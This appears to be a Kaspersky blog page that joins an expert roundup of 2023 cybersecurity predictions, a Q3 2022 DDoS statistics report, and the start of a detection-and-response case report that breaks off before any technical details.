Knowing what the future holds can help with being prepared for emerging threats better. Every year, Kaspersky experts prepare forecasts for different industries, helping them to build a strong defense against any cybersecurity threats they might face in the foreseeable future. Those predictions form Kaspersky Security Bulletin (KSB), an annual project lead by Kaspersky experts.

As for KSB 2022, we invited notable experts to share their insights and unbiased opinions on what we should expect from cybersecurity in the following year. The contributors include representatives from government institutions: H.E. Dr.Mohamed Al Kuwaiti (UAE Cyber Security Council), and public organizations: Kubo Mačák, Tilman Rodenhäuser, Mauro Vignati (ICRC), Serge Droz (FIRST), Sven Herpig (the think tank Stiftung Neue Verantwortung). Also, we’d like to thank Prof. Dr. Dennis-Kenji Kipker (the University of Bremen; European Academy for Freedom of Information and Data Protection (EAID)), Arthur Laudrain (The Hague Centre for Strategic Studies), Stefan Soesanto (The Center for Security Studies (CSS) at ETH Zurich) for their scientific and profound contribution. Moreover, we included predictions made by our fellow commercial organizations – James Range (White Rock Security Group) and Irena Yordanova (Polycomp Ltd.).

The opinions shared by the contributing experts do demonstrate a complexity of the modern cybersecurity industry and a strong need for collaboration among different organizations in order to combat cyberthreats that companies, individuals or even whole countries are exposed to.

What cyberthreats for business will be the greatest in 2023?

Vladimir Dashchenko, Security Evangelist, Kaspersky

The ongoing geopolitical storm brings not only classical cyberthreats for business, but also unpredictable risks and ‘black swans’. The main problem for 2023 will be supply-chain stability and cybersecurity. While supply-chain is a big challenge for business right now, its cybersecurity is not merely an issue, it’s a major problem. Supply-chain will become more of a sweet spot for targeted ransomware and state-sponsored espionage campaigns.

Another big issue is global semiconductor shortage. This will definitely play its role in corporate cybersecurity. While many companies need increasingly more computing power, (servers, workstations, network hardware and so on…) the price on the equipment continues to rise. There’s a possibility that, to cover hardware needs, some of the businesses will have to cut planned cybersecurity expenses.

Yury Slobodyanuk, head of content filtering research, Kaspersky

I think we will continue seeing attacks targeting the infrastructure of different countries and organizations. Phishing attacks are going to become even more sophisticated, since a lot of basic tactics have already been tried this year, and businesses learned to repel those.

Ivan Kwiatkowski, senior security researcher, Global Research and Analysis Team, Kaspersky

Businesses will still be mostly concerned with ransomware. The conflict between Russia and Ukraine has marked an end to any possible law enforcement cooperation in the foreseeable future. We can therefore expect that cybercrime groups from either block will feel safe to attack companies from the opposing side. Some may even perceive this as their patriotic duty. The economic downturn (caused by energy prices, inflation, sanctions, etc.) will lead more people to poverty, which always translates to increased criminality (cyber or otherwise), and we know ransomware to be extremely profitable.

James Range, President of White Rock Security Group

Zero trust will take on greater prominence with the continued role of the remote and hybrid workplace. Remote work will continue driving the need for zero trust since hybrid work is now the new normal. With the federal government mandating agencies to adopt zero-trust network policies and design, we expect this to become more common and the private sector to follow suit as 2023 becomes the year of verifying everything.

Arthur Laudrain, Strategic Analyst (Cyber Program), The Hague Centre for Strategic Studies

In 2023, we might see a slight decline in the raw number of ransomware attacks, reflecting the slowdown of the cryptocurrency markets. However, ransomware operators will keep professionalizing their operations and will target higher value organizations. At the same time, state-sponsored attacks will remain high in the threat landscape, with no ease of geopolitical tensions with Russia, China, North Korea, and Iran in sight. Businesses most at risk are aerospace and defense contractors, as well as critical infrastructure operators (utilities such as water, electricity, and Internet, but also hospitals and operators of large cyber-physical systems such as dams).

Stefan Soesanto, Senior Cyber Defense Researcher, The Center for Security Studies (CSS) at ETH Zürich

If I had a magic 8-ball, I would predict that the greatest cyberthreats to businesses in 2023 will be a significant increase in foreign intelligence services conducting operations under the cover of hacktivist groups, fighting big oil, climate change, fiscal policies etc. And that (b) we are also likely to see a steep increase in DDoS extortion campaigns as the Cyberwar in Ukraine leads to all-time-high levels of DDoS attacks.

Irena Yordanova, Product Manager Software, Polycomp Ltd.

We expect cyberthreats to rise in 2023, as unrest in the world contributes to an increase in cybercrimes. Malware attacks like ransomware will happen to businesses more frequently. And IT teams should be prepared to deal with evolving threats posed by emerging technologies which are becoming widespread, such as geo-targeted phishing or attacks related to Cloud Security, IOT and AI. Most probably more attacks on the education and healthcare sectors will occur plus targeted campaigns against industry leaders – especially those that hold critical information: sensitive data, top expertise, and latest technologies. Given that, employees should be educated and equipped to fight these mature attacks; and their companies can contribute by having experienced outside security partners to support them on this issue. End-users can prepare themselves with an easy-to-use security solution for upcoming challenges, whether it’s phishing attacks or threats related to multiple layers of security.

What cybersecurity challenges will industries face next year?

Vladimir Dashchenko, Security Evangelist, Kaspersky

Threat modeling approaches will be changed in 2023. Internet ‘balkanization’, ongoing military conflicts, changes, and tensions in existing political groups of countries are influencing cyberspace and cybercrime. We will see an increasing number of cybercriminals taking political sides and breaking the law with political statements. Also, script-kiddies (low skilled hackers) will be joining groups of cybercriminals led by more skilled perpetrators, or state sponsored hackers more often.

The major challenge for cybersecurity itself will be a lack of transparency and information sharing between companies. It will be extremely difficult to follow the ‘business as usual’ concept and remain neutral. Global political conglomerates will unfortunately influence cyberspace and cybersecurity.

Arthur Laudrain, Strategic Analyst (Cyber Program), The Hague Centre for Strategic Studies

Next year should see a continuation of existing trends. In particular, governments, critical infrastructure operators, and businesses with a large international footprint will face the continued challenge of ensuring the safety and integrity of their supply-chains, both in terms of software and hardware. Often, this will require closer integration with their contractors and suppliers, none the least to comply with new regulatory obligations in the U.S. and the E.U.

James Range, President of White Rock Security Group

Given the continued surge of ransomware attacks, which soared 288% in the first half of 2022 alone, the need for cyber insurance will be a bigger priority, especially in the SMB market. Although many industry experts argue against payouts, making cyber coverage a controversial topic, the evolving threat landscape means cyber insurance should be a top consideration as part of organizations’ cyber strategy. As such, we anticipate a booming cyber insurance industry as many organizations heed these warnings and seek to guard against ransomware attacks. Yet, in addition to cyber insurance, companies will need a designated DR or RR (Rolling Recovery) plan.

Kubo Mačák, Legal Adviser, Tilman Rodenhäuser, Legal Adviser, Mauro Vignati, Adviser on Digital Technologies of Warfare, ICRC

A key concern for 2023 is that civilians will be further impacted by cyber operations during armed conflict. Civilian data, devices, and networks – such as government services, critical infrastructure, or companies – risk being deliberately disrupted or damaged, often in violation of the laws of war. Civilians – individuals and companies – may get drawn into digital warfare activities, encouraged to engage in cyber operations or to support kinetic military operations through digital means. Such developments put people and societies in danger and undermine the cardinal rule that belligerents must at all times distinguish between what is military and what is civilian.

Stefan Soesanto, Senior Cyber Defense Researcher, Center for Security Studies (CSS)

I expect that the theft of medical data (ex. Finland’s Vastamoo in 2020 & Australia’s Medibank in 2022), as well as highly private personal data (ex. Ashley Madison in 2015) will become the major focus of ransomware groups and other cybercriminal actors alike. Underpinning this trend, the lesson learned is that imposing massive psychological pressure directly on thousands of separate victims, increases the likelihood of individual extortion payouts being made.

What cyberthreats will pose the most danger to end-users?

Yury Slobodyanuk, head of content filtering research, Kaspersky

As the geopolitical situation is quite tense, different types of fraud will take advantage of new events that will take place. Also, various techniques of generating fake news using AI may be used.

Sven Herpig, Director Cybersecurity at think tank Stiftung Neue Verantwortung

I believe cybercrime is the biggest threat to end-users, but mainly in an indirect fashion. Cybercrime is looming over providers of essential services and goods such as municipalities, hospitals and even producers of baby food offline, rendering them less or non-operational for several days or weeks. This has a direct impact on citizens’ lives in the real world and is therefore something that I would see as one of the most prevailing threats to individuals.

Prof. Dr. Dennis-Kenji Kipker, Professor for IT Security Law at the University of Bremen; Visiting Professor at Riga Graduate School of Law; Member of the Board of the European Academy for Freedom of Information and Data Protection (EAID)

Remote workers in home offices continue to play a major role in everyday working daily life, along with the increased use of BYOD, which takes control of devices away from administrators. Since 2020, therefore, forms of spear phishing, social engineering and CEO fraud, as well as ransomware, become increasingly prevalent and will continue to be of considerable importance in 2023. The professionalization of cybercrime, now an independent “industry”, is contributing to a further tightening of the security situation for end users, as low-cost mass attacks are made possible in this way.

H.E. Dr.Mohamed Al Kuwaiti, UAE Cyber Security Council

IoT Vulnerabilities. Security issues keep plaguing IoT devices dominating the market today. As IoT combines the physical world and virtual space, home intrusions are being added to the list of the scariest possible threats that IoT brings.

Vulnerabilities in Autonomous Vehicles. Due to the inherent risks of Autonomous Vehicles, they are increasingly vulnerable to attacks resulting in data breaches, supply chain disruptions, property damage, financial loss, and injury or loss of life.

What are the main challenges cybersecurity will face in 2023?

Ivan Kwiatkowski, senior security researcher, GReAT Kaspersky

The security industry will face direct pressure resulting from the political situation. Things were complex before and they will only get worse. The biggest challenge that vendors will have to face in 2023 will be to remain neutral, if they haven’t decided to align with one block or the other already. (My opinion on this bigger matter is explained in this talk.) Generally speaking, politics and threat intelligence will become more and more entwined, and we’re very unprepared for this as a community.

Yury Slobodyanuk, head of content filtering research, Kaspersky

I think attacks will evolve a lot quicker next year, and a main challenge will be to still be a couple of steps ahead.

Sven Herpig, Director Cybersecurity at think tank Stiftung Neue Verantwortung

I don’t think that there will be anything substantially new in 2023 – one of the key challenges will still be the lack of adoption of basic security and resilience measures which cybercriminals will successfully exploit.

Prof. Dr. Dennis-Kenji Kipker, Professor for IT Security Law at the University of Bremen; Visiting Professor at Riga Graduate School of Law; Member of the Board of the European Academy for Freedom of Information and Data Protection (EAID)

Cybersecurity requires not only secure software, but also sufficiently trustworthy hardware. For too long, we have relied on globalization in IT security and placed too little emphasis on protecting the digital supply chain. In Germany, this was made clear by the debate about protecting sensitive 5G networks; in the geostrategic conflict between the People’s Republic of China and Taiwan, we are now seeing that we are already in the midst of a semiconductor crisis that threatens the security of supply with trustworthy IT. Here, it can be assumed that significant cybersecurity challenges will continue to rise in 2023 as political tensions grow.

Serge Droz, Technical Advisor, Member of the Board, FIRST

Cybercrime will continue to focus on optimizing gains per investment, meaning that smaller and/or less mature organizations will be targeted even more. These may be SMEs or businesses in sectors that don’t include IT in their core business, in particular health services. The problem with this target group is that they either have very different priorities (a ransomed hospital simply cannot afford to delay recovery, and thus pays) and don’t have the resources to defend themselves, or they just don’t have the expertise. This is what Wendy Nater calls “living below the security poverty line”. And this will be the challenge to our industry: how can we provide effective protection that works and is affordable to these types of organizations. Or in other words, can we provide security services to people other than for security specialists? My guess would be that reaching this goal requires different industries working together, in particular I feel the role of insurance needs to be clarified and aligned.

James Range, President of White Rock Security Group

Cyber teams are going to be in the spotlight now more than ever. Understanding your security posture is crucial; knowing what current tools are available and the gaps that currently exist in your infrastructure will help you to protect your enterprise. The need for bigger cyber budgets and having the right people in place is critical. With ongoing talent shortages, consider partnering with a third-party firm to ensure you have fail-proof processes, documentation, and regular third-party assessments.

H.E. Dr.Mohamed Al Kuwaiti, UAE Cyber Security Council

DDOS Botnets. One of the most recent severe attacks around the end of June 2021, was made using malware called the Mēris botnet which has climbed to the record. Due to the new nature of the malware as it has been described as a “new assaulting force on the Internet – a botnet of a new kind” and its impact is more likely to be that similar real-time emerging malware-related DDoS attacks like this one will be used in 2023.

Ransomware as a service (RaaS). Unlike other forms of malware, this new service provides “a sort of criminal Content Distribution Network (CDN) similar, in principle, to those used by major internet portals but used exclusively for malware”. Nearly half of breaches during the first six months of 2022 involved stolen credentials, Switzerland-based cybersecurity company Acronis reported in its Mid-Year Cyberthreat Report, published on August 24, 2022. This has probably been the most discussed attack in 2022 as it’s the first time a country declared a national emergency in response to a cyber-attack. Ransomware-based malware had been quite active in 2022.

Deep fake enabled business compromise. Deepfake-enabled compromise is a type of attack where threat actors leverage synthetic content. This includes video or audio altered or created using artificial intelligence and machine learning to impersonate C-suite executives and trick employees into transferring large sums of cash.

DDoS attacks in Q3 2022

7 Listopad, 2022 - 09:00

News overview

In Q3 2022, DDoS attacks were, more often than not, it seemed, politically motivated. As before, most news was focused on the conflict between Russia and Ukraine, but other high-profile events also affected the DDoS landscape this quarter.

The pro-Russian group Killnet, active since January 2022, took the responsibility for several more cyberattacks. According to the hacktivists themselves, more than 200 websites in Estonia fell victim to their attacks, including the ESTO AS payment system. In nearby Lithuania, the websites and e-services of the energy company Ignitis Group were hit. Both attacks were described by the affected organizations as the largest they’ve faced in the last 10–15 years.

Killnet also claimed responsibility for an attack on the website and services of the US Electronic Federal Tax Payment System. The attackers stated on Telegram that they were “testing a new DDoS method.” During the attack, they said, the site administration tried to change the DDoS protection vendor, but then had a rethink. In addition, Killnet disrupted the US Congress website for a couple of hours.

On the other side of the Pacific, in Japan, 20 websites of four different government departments were hit by DDoS attacks. Killnet hacktivists claimed involvement in this incident, too. The defending side managed to eliminate the main damage within 24 hours, although the e-Gov administrative portal continued to experience access problems the day after.

The lesser known pro-Russian group Noname057(16) took the credit for the attacks on the website of Finland’s parliament and the publication archive of its government, which they managed to take offline temporarily. If the group’s Telegram channel is to be believed, the reason for the attacks was because “[Finnish] officials are so eager to join NATO.”

In turn, Russian resources suffered from DDoS attacks by pro-Ukrainian hacktivists. Victims included the Unistream, Korona Pay, and Mir payment systems, as well as the Russian National Payment Card System, which ensures the operation of Mir and the Faster Payments System. What’s more, activists brought down the website, call center, and SMS provider of Gazprombank; Otkritie Bank noted disruptions to its internet banking service and mobile app, and SberBank reported 450 repelled DDoS attacks in the first two months of Q3. According to SberBank, this is the same number as in the previous five years put together.

Electronic document management systems, in particular SKB Kontur and Taxcom, were also in the firing line. Their websites were either down or slow, which caused supply troubles for dairy producers. The websites of the political parties United Russia, Young Guard of United Russia, and A Just Russia — For Truth.

Media outlets did not go unaddressed either: RIA Novosti and Sputnik suffered attacks that lasted almost 24 hours, while the website of Argumenti i Fakti was unavailable for some time. Meanwhile, StormWall reported that 70 regional newspapers in 14 Russian cities, among them Bryansk, Kaluga, Chelyabinsk, Pskov, Omsk, Tyumen, and Sochi, were hit by garbage traffic.

A wave of DDoS attacks swept across many tech and entertainment companies as well. Hacktivists attacked around 20 Russian video-conferencing platforms. Among the services affected were TrueConf, Videomost, Webinar.ru, and iMind. Also targeted were the websites of Kinomax, Mori Cinema, Luxor, Almaz Cinema, and other movie theaters. Hacktivists also tried to disable the websites of the car information portal Drom, the drone store MyDrone, and the security vendor Avangard.

Already in Q1, various sites and apps were available to allow technically inexperienced users who sympathize with Ukraine to join DDoS attacks against Russian resources. The Russian-speaking APT group Turla exploited the hype. In July, Google researchers reported a piece of Android malware being distributed by cybercriminals under the guise of a DDoS tool for attacking Russian websites. According to experts, this is Turla’s first ever malware for Android.

Besides the Russia–Ukraine conflict, there were reports of politically motivated DDoS attacks in other hot spots on the planet. US Congress Speaker Nancy Pelosi’s visit to Taiwan provoked not only a public outcry in mainland China, but also a string of cyberattacks both before her arrival on the island and in the hours immediately after. In particular, the websites of Taiwan’s president and its Ministry of National Defense experienced downtime. Also affected were the online resources of the Ministry of Foreign Affairs and Taoyuan International Airport.

Israel, too, became a DDoS target when cybercriminals attacked the websites of the country’s Ministry of Health and Tel Aviv-Yafo Municipality. As a result, access to these resources from abroad was limited. Responsibility for the cyberattacks was claimed by Al-Tahira (aka ALtahrea), a group opposed to NATO and its allies.

The post-Soviet space was also a hotbed of activity. Amid the escalating conflict between Armenia and Azerbaijan, a DDoS attack battered the official site of the Collective Security Treaty Organization (CSTO), a Russia-led military alliance in Eurasia. The CSTO reported that attackers, under the guise of a DDoS, had attempted to change some information on its website. And in the last third of September, the Kazakhstani segment of the internet faced a DDoS onslaught from abroad. At around the same time, local media (Top Press, New Times, Skif News) were also subjected to DDoS attacks.

Some events in Q3 could not be described as unambiguously political. For example, the company Russian Environmental Operator reported DDoS attacks on the new Secondary Material Resources Exchange immediately after the announcement of the platform’s launch. Although this may have been part of a hacktivist campaign, new online resources regularly face DDoS attacks before going live even during quiet times. The largest Russian-language torrent tracker RuTracker and the entertainment portal Live62 also admitted to being attacked in Q3. Both sites have been beset by copyright infringement claims, and RuTracker has been blocked in Russia as a pirate resource.

In addition, a number of firms specializing in DDoS protection reported major attacks in Q3.

Akamai announced two major attacks on the same client from Eastern Europe. In both cases, the number of packets per second sent by the attackers was extraordinary. The first attack, on July 21, peaked at 659.6 million packets per second, a new European record at the time, says Akamai. This was not an isolated case: in July, this same client was attacked more than 70 times. The record held until September 12, when another attack posted 704.8 million packets per second.

In continuation of a Q2 trend, Google says it blocked an HTTPS-based DDoS attack that peaked at 46 million requests per second, 77 percent more than the record-breaking HTTPS attack mentioned in our previous report. According to experts, the attack involved more than 5,000 IP addresses from 132 countries, with around 30 percent of the traffic coming from Brazil, India, Russia, and Indonesia. The geographical distribution and botnet characteristics suggest the use of the Mēris family.

Lumen reported stopping an attack with a capacity of over 1 terabyte per second on the servers of its client. At the time of the attack, the target servers were hosting a gaming service. In the week leading up to the incident, the attackers tested various DDoS methods and studied the victim’s protection capabilities by issuing commands to bots from three different C2 servers.

Gaming services are regularly targeted by DDoS. In Q3, the servers of Gaijin Entertainment, which developed War Thunder, Enlisted, and Crossout, were hit by an extended series of attacks. They began on September 24, and users were still complaining of disruptions at the time of writing. To reduce the negative effect of the DDoS attack, Gaijin promised to extend its promotions and premium subscriptions, as well as award bonuses to players for a whole week.

The North American data centers of Final Fantasy 14 were attacked in early August. Players experienced connection, login, and data-sharing issues. Blizzard’s multiplayer games — Call of Duty, World of Warcraft, Overwatch, Hearthstone, and Diablo: Immortal — were also DDoSed yet again.

An ESL eSports match between the teams NaVi and Heroic was held up for over an hour due to a DDoS attack on individual players. The match continued only after the organizer had dealt with the threat.

In turn, the developers of the game Tanki Online announced they had finally neutralized a string of DDoS attacks that had plagued players since the summer. Having beefed up protection and stabilized the servers, the organizers thanked the players for their patience with a prize giveaway.

That was not the only good news regarding DDoS attacks on gaming services this quarter: in Sweden, police detained a suspect in a DDoS attack on Esportal, a CS:GO tournament platform. If convicted, they face from six months to six years in prison.

Anti-DDoS measures are also being implemented at the national level. For instance, Israel announced the launch of the Cyber-Dome project, designed to secure national digital resources. According to the Israel National Cyber Directorate, having a single protective complex will “elevate national cybersecurity by implementing new mechanisms in the national cyber perimeter and reducing the harm from cyberattacks at scale.”

In Bangladesh, the governmental Computer Incident Response Team required all key organizations, including those responsible for the country’s IT infrastructure, to develop and introduce anti-DDoS measures. This came after a reported spike in attacks.

At the same time, the global legal consensus that any DDoS attack constitutes a cybercrime came under threat in Q3, and from an unexpected source. The Hungarian Cable Communications Association (MKSZ) requested that the law be changed to officially allow MKSZ members and legal enterprises from the telecom industry to carry out DDoS attacks as a means of combating IPTV piracy. Traditional measures, such as blocking IP addresses and domain names, MKSZ described as slow and ineffective, while legally sanctioned cyberattacks could genuinely force users to abandon pirate services.

It was not only Hungarian telecom companies that had the idea of taking the fight to cybercriminals. After the ransomware group LockBit hacked Entrust, a specialist cybersecurity firm, and began publishing confidential data, unknown actors attacked the site where the information was being leaked. The packets they sent contained an unambiguously worded message: DELETE_ENTRUSTCOM_[BAD_WORD].

Quarter trends

The main surprise of Q3 2022 was the lack of surprises, which were continuously present since late 2021. But that doesn’t mean it was a dull quarter. Let’s take a look at the statistics.

Comparative number of DDoS attacks, Q3 2021, Q2 and Q3 2022. Q3 2021 data is taken as 100% (download)

The first thing worth noting is the significant rise in the number of DDoS attacks of all types relative to the previous reporting period. At the same time the quarter picture is fairly standard: a relatively calm summer followed by a sharp surge in DDoS activity. In September, the Kaspersky DDoS Protection team repelled 51 percent of all attacks in the quarter, which amounts to roughly the same number as in the previous two months. This is a normal situation that we observe and report on every year. Usually the autumn growth is more of a recovery after the summer slump, but the fact remains that the number of DDoS attacks always increases sharply in September. This is due to a general rise in activity after the lazy summer months: people return from vacation, students go back to school, and everything picks up, including the DDoS market.

Share of smart attacks, Q3 2021 and Q2/Q3 2022 (download)

What is unusual, however, is the continued growth in the share of smart attacks, which, with 53 percent, already account for the majority, setting a new record in the history of our observations. Moreover, DDoS attacks on HTTP(S) this quarter exceeded those on TCP for the first time, despite the latter being easier to organize and still the most common type of DDoS.

Ratio of HTTP(S) and TCP attacks, Q2 2021–Q3 2022 The number of TCP-based attacks for the corresponding period is taken as 100% (download)

What’s most interesting is that, in absolute terms, the number of attacks on HTTP(S) has remained quite stable over the past year. The share of attacks on TCP is on a downward curve, which reflects well the general trend: the share of dumb DDoS attacks is falling, while that of smart attacks is growing. This was bound to happen sooner or later, as tools on both the attacking and defending sides evolve and become more readily available. Organizing L7 attacks is getting easier, while L4 attacks are losing their effectiveness. As a result, they are being used less and less by professionals in their pure form (although L4 vectors are still found in mixed attacks), and more and more by amateurs. The above figures illustrate this well.

Note this Q1 2022 stat: There were half as many DDoS attacks on HTTP(S) as on TCP. February and March saw a significant increase in non-professional attacks due to the geopolitical situation, as outlined in our report. Hacktivists are passionate but fickle. Having quickly tired of DDoS, they switched to other attacks, and the share of DDoS started to fall. By Q3, it was tending to zero. Meanwhile, the number of high-quality professional attacks, after increasing in Q1, remains at a high level. The targets have not changed either: mainly the financial and government sectors. Both of these facts reinforce our notion that, from the spring until at least the end of September, professionals were working to order against these sectors, which is reflected in our statistics.

In terms of DDoS attack duration, there were no new records: if Q2 was marked by the longest attack ever observed, Q3 was calmer: on average, attacks lasted about eight hours, with the longest being just under four days. Compared to the previous quarter, this seems rather modest, but the numbers are still huge: in Q3 of last year, the duration of DDoS attacks was measured in minutes, not hours. In this regard, the situation remains challenging.

DDoS attack duration, Q3 2021 and Q2/Q3 2022. Q3 2021 data is taken as 100% (download)

DDoS attack statistics Methodology

Kaspersky has a long history of combating cyberthreats, including DDoS attacks of varying type and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C2 servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q3 2022.

In the context of this report, the incident is counted as a single DDoS-attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same resource is attacked by the same botnet after an interval of 24 hours or more, two attacks will be counted. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographic locations of DDoS-attack victims and C2 servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.

Quarter summary

In Q3 2022:

  • Kaspersky’s DDoS Intelligence system detected 57,116 DDoS attacks.
  • A total of 39.61 percent of targets, affected by 39.60 percent of attacks, were located in the US.
  • The busiest day of the week (15.36 percent of attacks) was Friday and the calmest (12.99 percent) was Thursday.
  • July saw the sharpest contrast: The 1st and 5th saw 1494 and 1492 attacks, respectively, and the 24th just 135.
  • Attacks lasting less than four hours accounted for 60.65 percent of the total duration of attacks and for 94.29 percent of the total number of attacks.
  • UDP flood accounted for 51.84 percent of the total number of attacks, and SYN flood for 26.96 percent.
  • The country with the largest share of bots trying to hack into Kaspersky SSH honeypots was the US (17.60%).
DDoS attack geography

In Q3 2022, the top four countries in terms of resources attacked remained unchanged from the previous reporting period. The US (39.60%) remained in first place, despite losing 6.35 percentage points. Mainland China’s share (13.98%) increased by almost the same amount, up 6.31 percentage points, securing second place. Germany (5.07%) remains in third and France (4.81%) in fourth place.

Hong Kong (4.62%) rounded out the TOP 10 countries and territories with the highest number of DDoS attacks last quarter. Having seen its share more than double this quarter, it now ranks fifth. Brazil (4.19%) moved up into sixth position, while Canada (4.10%) and the UK (3.02%), which ranked fifth and sixth last quarter, dropped to seventh and eighth, respectively. Propping up the TOP 10 are Singapore (2.13%) and the Netherlands (2.06%).

Distribution of DDoS attacks by country and territory, Q2 and Q3 2022 (download)

The distribution of unique DDoS attack targets by country and territory is almost a carbon copy of the attack rating. In first place is the US (39.61%), followed by mainland China (12.41%), whose share grew most noticeably over the quarter, up 4.5 percentage points. Third place still belongs to Germany (5.28%), and fourth to France (4.79%).

As in the distribution of attacks, Brazil (4.37%) and Hong Kong (4.36%) ranked fifth and sixth by number of unique targets, but in reverse order. The former was home to slightly more DDoS targets, while the latter showed larger growth against the previous reporting period, climbing 2.36 percentage points. Canada (3.21%), the UK (2.96%) and Singapore (2.11%) occupied lines seven to nine in the table, while tenth place went to Poland (2.00%), squeezing the Netherlands (1.86%) out of the TOP 10.

Distribution of unique targets by country and territory, Q2 2022 and Q3 2022 (download)

Dynamics of the number of DDoS attacks

The number of DDoS attacks in Q3 2022 fell again. Having decreased by 13.72 percent in the previous reporting period relative to the one before, this quarter it dropped by a further 27.29 percent, to 57,116. August proved to be the busiest month, with Kaspersky’s DDoS Intelligence system detecting an average of 824 attacks per day. July, on the other hand, was calm: 45.84 percent of all attacks during this month occurred in the first seven days, maintaining the dynamics of June, which posted an average of 1301 per day; starting from week two, however, the average number of daily attacks fell to 448. Thus, the July average was just 641 DDoS attacks per day, slightly ahead of the even quieter September, which averaged 628.5. At the same time, September’s attacks were distributed more evenly throughout the month.

The quarter’s peak and trough both came in July: the most aggressive day was the 1st (1494 attacks); the calmest was the 24th (135). In August, over a thousand attacks were recorded on the 8th and 12th alone (1087 and 1079, respectively), and the quietest day was the 30th (373). September delivered no noteworthy highs or lows.

Dynamics of the number of DDoS attacks, Q3 2022 (download)

Sunday (13.96%) in Q3 fell by 1.85 percentage points compared to the previous reporting period, and lost its position as the leading day in terms of traffic. Saturday’s share also declined, but remained above 15 percent. First place by number of DDoS attacks went to Friday, which showed a noticeable increase — from 13.33 to 15.36 percent. Thursday was the only day whose share dropped below 13 percent, down to 12.99 percent.

Distribution of DDoS attacks by day of the week, Q3 2022 (download)

Thursday was also the only weekday that saw its share decrease.

Duration and types of DDoS attacks

In Q3 2022, sustained attacks of 20 hours or more accounted for 19.05 percent of the total duration of attacks. This figure almost tripled after falling in the previous reporting period, almost reaching the level as that at the beginning of the year. Accordingly, the proportion of long-term attacks increased quantitatively: from 0.29 to 0.94 percent.

Short attacks lasting up to four hours showed a slight decrease to 94.29 percent. At the same time, their share of the total duration of DDoS attacks fell significantly, from 74.12 to 60.65 percent. Attacks lasting from five to nine hours remained in second place (3.16% of attacks); attacks lasting from 10 to 19 hours were in third (1.60%).

The longest attack of Q3 lasted 451 hours (18 days 19 hours). That was way ahead of the second-place 241 hours (10 days 1 hour). The average duration of attacks rose slightly to around 2 hours 2 minutes, which is not surprising given the increase in the share of sustained attacks and the decrease in the share of short ones.

Distribution of DDoS attacks by duration, Q2 and Q3 2022 (download)

In Q3 2022, the ranking of DDoS attack types was unchanged from the previous reporting period. The share of UDP flood fell from 62.53 to 51.84 percent, but remained the most common type of DDoS. The second most common, SYN flood, on the contrary, increased its share to 26.96 percent. TCP flood (15.73%) reversed its decline, adding more than 4 percentage points to hold on to third place. GRE flood and HTTP flood made up 3.70 and 1.77 percent, respectively, of the total number of attacks.

Distribution of DDoS attacks by type, Q3 2022 (download)

Geographic distribution of botnets

Botnet C2 servers are still mainly located in the US (43.10.%), but its share fell by 3 percentage points. The Netherlands (9.34%), which ranked second last quarter, slipped more than 5 percentage points and again changed places with Germany (10.19%). Russia (5.94%) stayed in fourth place.

Asian countries come next: fifth place goes to Singapore (4.46%) and sixth to Vietnam (2.97%), whose share in Q3 continued to grow, although not as rapidly as in Q2. They are followed by a new entry in the ranking, Bulgaria (2.55%), whose share increased more than sixfold.

France dropped from fifth place to eighth (2.34%), and the UK (1.91%) to ninth. Canada and Croatia, which rounded out last quarter’s TOP 10, gave way to Hong Kong (1.49%) by number of C2 servers.

Distribution of botnet C2 servers by country and territory, Q3 2022 (download)

Attacks on IoT honeypots

In Q3, mainland China surrendered its lead in terms of number of bots attacking Kaspersky SSH honeypots: its share dropped to 10.80 percent. First place was claimed instead by US-based bots (17.60%). Third, fourth, and fifth positions, with hardly any distance between, belong to India (5.39%), South Korea (5.20%), and Brazil (5.01%). Germany (4.13%) dropped from third place last quarter to seventh, but bots based there were among the most active in Q3, responsible for 11.22 percent of attacks. This figure is bettered only by the US bots (27.85%). What’s more, over five percent of attacks came from bots in Singapore (5.95%) and India (5.17%), which took third and fourth place, respectively.

TOP 10 countries and territories by number of devices from which Kaspersky SSH traps were attacked, Q3 2022 (download)

As for Kaspersky Telnet honeypots, here mainland China retained its lead among countries and territories by number of both attacks and attacking devices. The first figure, however, declined from 58.89 to 38.18 percent, while the second climbed slightly from 39.41 to 41.91 percent. Second place by number of attacks went to the US (11.30%), with Russia third (9.56%). In terms of their share of bots, these two countries rank slightly lower: in sixth (4.32%) and fourth (4.61%) place, respectively. The TOP 3 countries by number of bots featured South Korea (8.44%) and India (6.71%). Taiwan ranked fifth with 4.39 percent.

TOP 10 countries and territories by number of devices from which Kaspersky Telnet traps were attacked, Q3 2022 (download)

Conclusion

The situation in Q3 2022 points to a stabilization of the DDoS market after a tumultuous first half of the year, although it remains difficult. Yet the picture changes every quarter and forecasts remain tentative at best: pretty much anything can happen. That said, we don’t expect any significant surges or drops in Q4. If our conclusions are correct, and the market is indeed back on a predictable track, we expect similar indicators in Q4 as in Q3, adjusted for the slight growth we usually see toward the end of the year. In any case, we can assume such a development in terms of both number and quality of attacks. As for duration, here we can only guess: the DDoS market is still very far from the norm, and the length of attacks tends to jump up and down. We hope that Q4 shows relative stability in this regard, too, and does not try to break any records.

Server-side attacks, C&C in public clouds and other MDR cases we observed

2 Listopad, 2022 - 09:00

Introduction

This report describes several interesting incidents observed by the Kaspersky Managed Detection and Response (MDR) team. The goal of the report is to inform our customers about techniques used by attackers. We hope that learning about the attacks that took place in the wild helps you to stay up to date on the modern threat landscape and to be better prepared for attacks.

Command and control via the public cloud

The use of public cloud services like Amazon, Azure or Google can make an attacker’s server difficult to spot. Kaspersky has reported several incidents where attackers used cloud services for C&C.

Case #1: Cloudflare Workers as redirectors Case description

The incident started with Kaspersky MDR detecting the use of a comprehensive toolset for security assessment, presumably Cobalt Strike, by an antimalware (AM) engine memory scan (MEM:Trojan.Win64.Cobalt.gen). The memory space belongs to the process c:\windows\system32\[legitimate binary name][1].exe.

While investigating, we found that the process had initiated network connections to a potential C&C server:

